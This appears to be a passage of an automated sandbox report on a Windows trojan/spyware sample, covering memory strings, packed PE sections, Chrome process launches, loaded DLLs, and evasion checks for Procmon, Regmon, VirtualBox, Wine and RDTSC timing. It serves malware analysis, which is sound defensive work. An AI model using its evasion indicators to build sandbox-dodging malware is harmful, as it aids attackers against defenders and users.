              Source: file.exe, 00000000.00000003.2017435249.0000000000DD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1992357372.0000000005B31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1986889440.00000000059EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1990604558.0000000005A04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1992652751.000000000593A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1990102729.0000000005A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1991441925.000000000593C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1988895791.0000000005A04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1985938647.0000000005A6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1996937999.0000000005932000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1983744584.0000000005598000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1986146194.0000000005937000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1983643044.0000000005732000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2017318203.0000000005492000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1995952650.0000000005A58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1988323699.00000000059F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1997617253.0000000005933000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1989657886.0000000005ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1993790189.0000000005936000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1996737842.0000000005B8D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1998874559.0000000005B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1986787351.0000000005936000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2017238695.00000000054B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1994102939.0000000005B51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1991722138.0000000005938000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1992063901.0000000005932000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1990293105.0000000005933000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1985270915.0000000005592000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1999127917.0000000005932000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2020053346.0000000005933000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1988213998.0000000005939000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2001621935.0000000005932000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2000862866.0000000005BBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1993232596.0000000005B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1994964708.000000000593C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1989312367.000000000593C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1995450588.0000000005A60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2000117374.0000000005A7E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1986286493.00000000059D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1999405695.0000000005A6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1996562569.0000000005A5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1986685492.0000000005A90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1997889046.0000000005A67000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1987994463.000000000593E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1985535151.0000000005593000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1988433252.0000000005933000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.9974409550330033
              Source: file.exeStatic PE information: Section: akxghhwi ZLIB complexity 0.994061902397764
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/61@7/7
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2008,i,3826648894822423509,4444800806446167080,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,2029121025495776,18205823423671010898,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2008,i,3826648894822423509,4444800806446167080,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,2029121025495776,18205823423671010898,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: file.exeStatic file information: File size 1910784 > 1048576
              Source: file.exeStatic PE information: Raw size of akxghhwi is bigger than: 0x100000 < 0x1a8e00
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1db102 should be: 0x1dc122
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: akxghhwi
              Source: file.exeStatic PE information: section name: yjeyyxpl
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DC25F2 pushfd ; iretd 0_3_00DC25F3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DC25F2 pushfd ; iretd 0_3_00DC25F3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DC25F2 pushfd ; iretd 0_3_00DC25F3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DC25F2 pushfd ; iretd 0_3_00DC25F3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DC25F2 pushfd ; iretd 0_3_00DC25F3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DC25F2 pushfd ; iretd 0_3_00DC25F3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DC25F2 pushfd ; iretd 0_3_00DC25F3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DC25F2 pushfd ; iretd 0_3_00DC25F3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DC25F2 pushfd ; iretd 0_3_00DC25F3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DDECD8 push eax; ret 0_3_00DDEE39
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DDEDCE push eax; ret 0_3_00DDEE39
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DDDE91 push esi; retf 0_3_00DDDE94
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DDED5B push eax; ret 0_3_00DDEE39
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DDDA13 push FFFFFFDBh; iretd 0_3_00DDDA24
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DB5030 push 8000D5CCh; retf 0_3_00DB5035
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DB5030 push 8000D5CCh; retf 0_3_00DB5035
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DB5030 push 8000D5CCh; retf 0_3_00DB5035
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DB5030 push 8000D5CCh; retf 0_3_00DB5035
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DDECD8 push eax; ret 0_3_00DDEE39
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DDEDCE push eax; ret 0_3_00DDEE39
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DDDE91 push esi; retf 0_3_00DDDE94
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DDED5B push eax; ret 0_3_00DDEE39
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DDDA13 push FFFFFFDBh; iretd 0_3_00DDDA24
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D769C8 push eax; iretd 0_3_00D769C9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D769C8 push eax; iretd 0_3_00D769C9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D6CBA0 pushfd ; retf 0_3_00D6CBA1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D6CBA0 pushfd ; retf 0_3_00D6CBA1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D6CB67 pushfd ; retf 0_3_00D6CB9D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D6CB67 pushfd ; retf 0_3_00D6CB9D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D78614 push esi; retf 0_3_00D78617
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D78614 push esi; retf 0_3_00D78617
              Source: file.exeStatic PE information: section name: entropy: 7.9788040996126055
              Source: file.exeStatic PE information: section name: akxghhwi entropy: 7.953902225631802

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22C211 second address: 22C215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ABB62 second address: 3ABB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 js 00007F5E6851342Ah 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ABB77 second address: 3ABB7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AAB8C second address: 3AABA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E6851342Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AABA2 second address: 3AABA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AABA6 second address: 3AABB7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jns 00007F5E68513426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AACBF second address: 3AACCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5E68E41F16h 0x0000000a pop ecx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AAF76 second address: 3AAF7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AAF7C second address: 3AAF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AAF82 second address: 3AAF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AB106 second address: 3AB11D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E68E41F22h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD4DA second address: 3AD4DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD4DE second address: 3AD4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
